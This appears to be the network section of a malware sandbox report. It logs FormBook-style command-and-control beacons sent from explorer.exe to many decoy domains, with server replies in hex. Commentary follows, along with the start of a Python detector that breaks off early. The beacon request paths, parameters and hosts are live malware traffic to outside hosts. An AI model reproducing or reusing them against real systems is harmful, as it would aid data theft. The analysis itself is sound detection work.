                                                                                Data Raw: 32 33 63 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 23c<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.5 | 49756 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 09:24:22.307404995 CET | 5156 | OUT | GET /igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.erpsystem.site
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Nov 21, 2020 09:24:22.422575951 CET | 5157 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Sat, 21 Nov 2020 08:24:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "5fb7c4ff-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.5 | 49757 | 81.169.145.95 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 09:24:27.529479027 CET | 5158 | OUT | GET /igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.forbigdogs.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Nov 21, 2020 09:24:27.551035881 CET | 5158 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Sat, 21 Nov 2020 08:24:27 GMT
                                                                                Server: Apache/2.4.43 (Unix)
                                                                                Content-Length: 196
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.5 | 49758 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 09:24:32.959045887 CET | 5159 | OUT | GET /igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.rockinglifefromhome.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Nov 21, 2020 09:24:33.074023008 CET | 5160 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Sat, 21 Nov 2020 08:24:33 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "5fb7c4ff-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.5 | 49759 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 09:24:38.272831917 CET | 5161 | OUT | GET /igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.allmm.info
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Nov 21, 2020 09:24:38.388168097 CET | 5161 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Sat, 21 Nov 2020 08:24:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "5fb7c4ff-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.5 | 49760 | 13.224.93.48 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 09:24:48.429152966 CET | 5162 | OUT | GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.ariasu-nakanokaikei.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Nov 21, 2020 09:24:48.445446014 CET | 5163 | IN | HTTP/1.1 301 Moved Permanently
                                                                                Server: CloudFront
                                                                                Date: Sat, 21 Nov 2020 08:24:48 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 183
                                                                                Connection: close
                                                                                Location: https://www.ariasu-nakanokaikei.com/igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                X-Cache: Redirect from cloudfront
                                                                                Via: 1.1 ebbd7f31e48ea8cf77f6021cdd92bf62.cloudfront.net (CloudFront)
                                                                                X-Amz-Cf-Pop: ZRH50-C1
                                                                                X-Amz-Cf-Id: kQDUShKpwKbutxLz03ey90bfXEs9uxcIn9QVJFiQp9TTjTf4tXOV3Q==
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49747 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 09:23:33.580173016 CET | 5135 | OUT | GET /igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.theoutdoorbed.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Nov 21, 2020 09:23:33.695125103 CET | 5136 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Sat, 21 Nov 2020 08:23:33 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "5fb7c735-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49748 | 185.201.11.126 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 09:23:38.914375067 CET | 5137 | OUT | GET /igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.sweetbasilmarketing.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Nov 21, 2020 09:23:39.243913889 CET | 5137 | IN | HTTP/1.1 301 Moved Permanently
                                                                                Connection: close
                                                                                X-Powered-By: PHP/7.2.34
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                X-Redirect-By: WordPress
                                                                                Location: http://sweetbasilmarketing.com/igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                X-Litespeed-Cache: miss
                                                                                Content-Length: 0
                                                                                Date: Sat, 21 Nov 2020 08:23:39 GMT
                                                                                Server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49749 | 3.127.175.50 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 09:23:44.354377985 CET | 5138 | OUT | GET /igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.pasumaisangam.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:23:44.371169090 CET | 5139 | IN | HTTP/1.1 301 Moved Permanently
                                                                                Server: nginx/1.16.1
                                                                                Date: Sat, 21 Nov 2020 08:23:44 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Location: https://www.pasumaisangam.com:443/igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.16.1</center></body></html>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                5 | 192.168.2.5 | 49750 | 52.71.133.130 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Nov 21, 2020 09:23:49.532294989 CET | 5139 | OUT | GET /igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.justsoldbykristen.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:23:49.635669947 CET | 5140 | IN | HTTP/1.1 301 Moved Permanently
                                                                                Server: openresty/1.17.8.2
                                                                                Date: Sat, 21 Nov 2020 08:23:49 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 175
                                                                                Connection: close
                                                                                Location: https://www.justsoldbykristen.com/igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                6 | 192.168.2.5 | 49752 | 192.155.168.14 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Nov 21, 2020 09:23:55.216972113 CET | 5149 | OUT | GET /igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.lotoencasa.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:23:55.423753023 CET | 5150 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Sat, 21 Nov 2020 08:23:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 1.0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                7 | 192.168.2.5 | 49753 | 204.188.203.155 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Nov 21, 2020 09:24:00.619348049 CET | 5151 | OUT | GET /igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.guidesgold.net
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:24:00.748373032 CET | 5151 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                Server: nginx
                                                                                Date: Sat, 21 Nov 2020 08:24:00 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Location: http://www.guidesgold.net?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                8 | 192.168.2.5 | 49754 | 198.54.117.211 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Nov 21, 2020 09:24:11.058880091 CET | 5154 | OUT | GET /igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.thoughtslate.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                9 | 192.168.2.5 | 49755 | 45.194.171.26 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Nov 21, 2020 09:24:16.826056004 CET | 5154 | OUT | GET /igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.chemtradent.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:24:17.230567932 CET | 5155 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                Server: nginx
                                                                                Date: Sat, 21 Nov 2020 08:24:17 GMT
                                                                                Content-Type: text/html; charset=gbk
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Location: /404.html
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0
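
Sessions 4 to 9 above all share one shape: the same path `/igqu/`, an opaque first parameter that changes every request, a second parameter (`JXhpvv=OXXTgtL8CzU0PRx0`) that never changes, a different Host header each time, and explorer.exe as the sending process. FormBook configurations carry a list of decoy domains alongside the live C2 and walk through them with this kind of request, which is why most hosts answer with redirects or nothing. The following is an added example, not part of the sandbox report and not the sample's code: it clusters sessions by (process, path, parameter name, parameter value) and flags any value that stays fixed across several distinct hosts. The tuple layout, the `min_hosts` threshold, the `NON_NETWORK_PROCESSES` set and the two Firefox rows used as a benign control are my assumptions; the FormBook rows are transcribed from the sessions above.

```python
"""Added example: surface a rotating-domain beacon from HTTP session records.
Not from the sandbox report or the FormBook sample."""
import ntpath
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed from the report's HTTP sessions 4-9. The tuple layout is my own
# (not the sandbox export format) and the last two rows are a constructed
# benign control, not report data.
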